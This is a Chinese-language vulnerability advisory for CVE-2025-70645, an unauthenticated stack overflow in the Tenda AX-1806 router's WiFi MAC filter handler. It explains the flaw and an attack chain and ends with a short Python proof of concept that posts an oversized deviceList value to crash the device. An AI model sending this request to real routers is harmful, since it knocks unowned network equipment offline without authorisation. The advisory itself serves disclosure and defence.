CVE-2025-70645 CVSS 7.5 高危

CVE-2025-70645 Tenda AX-1806 formSetWifiMacFilterCfg栈溢出漏洞

披露日期: 2026-01-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-70645

漏洞类型

栈溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda AX-1806 v1.0.0.1

漏洞概述

CVE-2025-70645是Tenda AX-1806 v1.0.0.1路由器中发现的栈溢出漏洞。该漏洞位于formSetWifiMacFilterCfg函数的deviceList参数中，攻击者可以通过构造恶意请求触发栈溢出，导致设备拒绝服务。此漏洞无需认证即可利用，攻击者可远程发送精心构造的数据包使路由器服务中断。由于该漏洞存在于Web管理界面的WiFi MAC过滤配置功能中，攻击者只需通过网络访问即可实施攻击，无需获取设备权限。

技术细节

漏洞源于formSetWifiMacFilterCfg函数对deviceList参数缺乏有效边界检查。当该参数接收到超长字符串时，溢出的数据会覆盖栈上的返回地址和关键寄存器状态，攻击者可利用此控制程序执行流程或直接导致崩溃。由于函数采用strcpy或类似不安全函数处理输入，在未验证长度的情况下直接将用户数据复制到固定大小栈缓冲区中，形成典型的栈溢出条件。攻击者可通过发送HTTP POST请求携带超长deviceList参数来触发漏洞，设备将立即崩溃或重启。

攻击链分析

STEP 1

扫描识别

识别运行Tenda AX-1806 v1.0.0.1固件的目标设备

STEP 2

构造请求

构建包含超长deviceList参数的恶意HTTP POST请求

STEP 3

触发漏洞

向/goform/formSetWifiMacFilterCfg端点发送恶意请求

STEP 4

导致崩溃

栈溢出覆盖返回地址，程序控制流被劫持，设备崩溃重启

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target = 'http://target_ip'
payload = 'A' * 1000

data = {
    'deviceList': payload
}

response = requests.post(f'{target}/goform/formSetWifiMacFilterCfg', data=data)
print(response.status_code)

影响范围

Tenda AX-1806 v1.0.0.1

防御指南

临时缓解措施

在Web应用层实现输入长度验证，使用安全字符串处理函数替代strcpy

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表